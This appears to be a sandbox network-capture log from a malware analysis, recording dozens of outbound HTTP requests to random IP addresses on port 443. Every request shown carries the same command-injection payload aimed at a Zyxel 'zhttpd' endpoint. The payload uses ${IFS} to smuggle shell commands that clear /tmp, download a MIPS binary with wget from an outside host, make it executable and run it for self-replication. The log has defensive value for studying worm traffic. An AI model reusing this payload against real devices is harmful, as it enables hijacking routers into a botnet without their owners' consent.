                                      Jan 19, 2024 17:29:27.677793980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3214192.168.2.1456138136.207.252.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677818060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3215192.168.2.1452540134.19.100.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677869081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3216192.168.2.143436880.20.20.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677906990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3217192.168.2.145739427.186.187.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677944899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3218192.168.2.1457180161.32.254.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677983999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3219192.168.2.145573451.240.83.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678023100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3220192.168.2.1458506196.190.107.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678067923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3221192.168.2.145175085.177.133.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678088903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3222192.168.2.143797412.103.68.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678159952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3223192.168.2.1443914166.18.30.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678201914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3224192.168.2.1451282222.23.228.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678232908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3225192.168.2.1449280126.118.179.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678275108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3226192.168.2.1460528186.151.156.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678313017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3227192.168.2.1459798163.70.192.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678352118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3228192.168.2.1449036218.144.33.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678370953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3229192.168.2.143334227.35.137.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678426981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3230192.168.2.1435522201.250.110.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678450108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3231192.168.2.146021470.127.136.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678492069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3232192.168.2.1433244102.57.21.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678530931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3233192.168.2.1451480131.184.248.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678585052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3234192.168.2.144725827.244.220.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678611040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3235192.168.2.1451468149.52.2.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678646088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3236192.168.2.1434416196.4.18.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678697109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3237192.168.2.143945219.182.255.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678728104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3238192.168.2.1442740209.200.159.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678769112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3239192.168.2.1440144169.38.231.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678803921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3240192.168.2.143410071.162.214.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678836107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3241192.168.2.1434938171.249.251.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678855896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3242192.168.2.1458296211.202.235.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678904057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3243192.168.2.145644223.231.47.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678945065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3244192.168.2.1458288101.43.160.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.678987980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3245192.168.2.1447960115.233.71.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679011106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3246192.168.2.1433806142.10.212.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679064035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3247192.168.2.145998839.58.13.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679076910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3248192.168.2.14515529.137.214.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679120064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3249192.168.2.145098847.116.26.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679162979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3250192.168.2.143846261.211.107.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679205894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3251192.168.2.1444630124.242.79.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679243088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3252192.168.2.144242272.204.138.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679301977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3253192.168.2.1434166112.59.110.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679322958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3254192.168.2.1442912165.199.146.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679358959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3255192.168.2.144711680.112.174.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679388046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3256192.168.2.144309224.7.5.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679439068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3257192.168.2.143321263.107.95.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679467916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3258192.168.2.1439284177.201.142.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679503918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3259192.168.2.144495677.92.6.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679564953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3260192.168.2.1449338185.229.206.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679593086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3261192.168.2.145797441.8.209.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679619074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3262192.168.2.1434120148.253.93.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679652929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3263192.168.2.1456020130.153.234.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679699898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3264192.168.2.1445682193.182.121.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679729939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3265192.168.2.143869669.201.42.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679769039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3266192.168.2.143365290.205.113.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679792881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3267192.168.2.1459324181.168.52.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679810047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3268192.168.2.1443206109.218.245.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679846048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3269192.168.2.1441668213.6.223.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679862022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3270192.168.2.144852458.14.40.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679923058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3271192.168.2.1441786179.127.235.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679953098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3272192.168.2.144854838.214.194.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.679982901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3273192.168.2.144920070.252.140.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680036068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3274192.168.2.1433686165.149.176.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680073977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3275192.168.2.1458386144.9.177.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680115938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3276192.168.2.145375489.214.255.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680162907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3277192.168.2.1459274212.169.167.11443
                                      TimestampBytes transferredDirectionData
